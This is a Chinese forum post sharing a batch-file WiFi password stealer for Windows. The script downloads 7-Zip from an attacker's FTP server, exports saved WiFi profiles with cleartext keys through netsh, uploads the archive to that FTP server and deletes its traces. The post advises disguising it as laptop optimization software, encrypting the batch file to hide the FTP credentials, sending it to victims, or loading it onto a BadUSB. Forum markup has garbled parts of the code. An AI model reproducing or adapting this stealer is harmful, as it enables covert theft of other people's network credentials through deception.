好久不来论坛了,讲真网络费用越来越便宜,PJ这事拿来当个业余爱好研究研究偶尔应急得了,自己用的话拉条线用着舒心不折腾。闲来无事上吾爱找软件发现了这个,有FTP的喜欢折腾的,做个badusb自己拿去玩玩吧。
关于badusb知乎直达:代号为 ‘BadUSB’ 的 USB 漏洞具体是何情况,有多大危害?
52原贴:一个用来偷wifi密码的软件
这个程序大致是“发给别人让他运行,然后他的wifi密码就能发回到你搭建的ftp服务器”,给大家分享一下。
程序原理是在运行程序后,利用 netsh wlan export profile key=clear folder=c: 命令将本地的密码导出,然后打包发给黑客搭建的ftp服务器
工作原理:
1.程序运行后,从指定ftp服务器“123.123.123.123”上下载7z.exe和7z.dll,一会打包密码用
2.获取密码,使用7z.exe和7z.dll打包压缩。
3.把压缩包发回ftp
这个程序是一个bat批处理程序,能够在win7下运行,将下面的代码保存为“笔记本性能优化【第一次使用可能运行时间稍长】.bat”(伪装成笔记本性能优化软件)的批处理程序即可。
下面是代码(里面的123.123.123.13修改为自己的ftp的地址,ftp用户名写自己的ftp用户名,ftp密码写自己的ftp密码,提前把7z.exe和7z.dll放到ftp根目录):
[url=home.php?mod=space uid=24852]@echo[/url] off@title 笔记本电脑优化[url=home.php?mod=space uid=29157]@mode[/url] con lines 14 cols 14[url=home.php?mod=space uid=903842]@color[/url] 01echo open 123.123.123.123 C:config.txtclsecho user ftp用户名 C:config.txtclsecho ftp密码 C:config.txtclsecho get 7z.dll C:z.dll C:config.txtclsecho get 7z.exe C:z.exe C:config.txtclsecho binary C:config.txtclsecho bye C:config.txtclsftp -n -s: C:config.txt clsdel C:config.txtclsnetsh wlan export profile key=clear folder=c: c:z a -tzip c:wifipwd.7z c:*.xml del /f /q c:*.xmlclsecho open 123.123.123.123 C:config.txtclsecho user ftp用户名 C:config.txtclsecho ftp密码 C:config.txtclsecho put C:wifipwd.7z wifipwd.7z C:config.txtclsecho binary C:config.txtclsecho bye C:config.txtclsftp -n -s: C:config.txt clsdel C:config.txtdel C:wifipwd.7zdel C:z.exedel C:z.dllcls复制代码7z.exe和7z.dll这两个程序是我们提前放在ftp服务器ftp根目录下的。当我们的窃取密码的批处理程序运行时,就会链接ftp服务器,把7z.exe和7z.dll下载到本地。如果没有被安全软件拦截的话,包含了无线密码的压缩包会被发到ftp上,内容如下:
(一个wifi一个xml文件) 随便打开一个xml文件,图片中标出的那一行就是该wifi的密码:
由于批处理文件是明文的,如果右键批处理,选择编辑,就会看到源码,这样非常不安全(ftp地址和账户密码都暴露了),所以最好自己找一个bat加密程序来为我们的窃取器加一下密。
加密后要本机测试,能成功运行后再发给别人!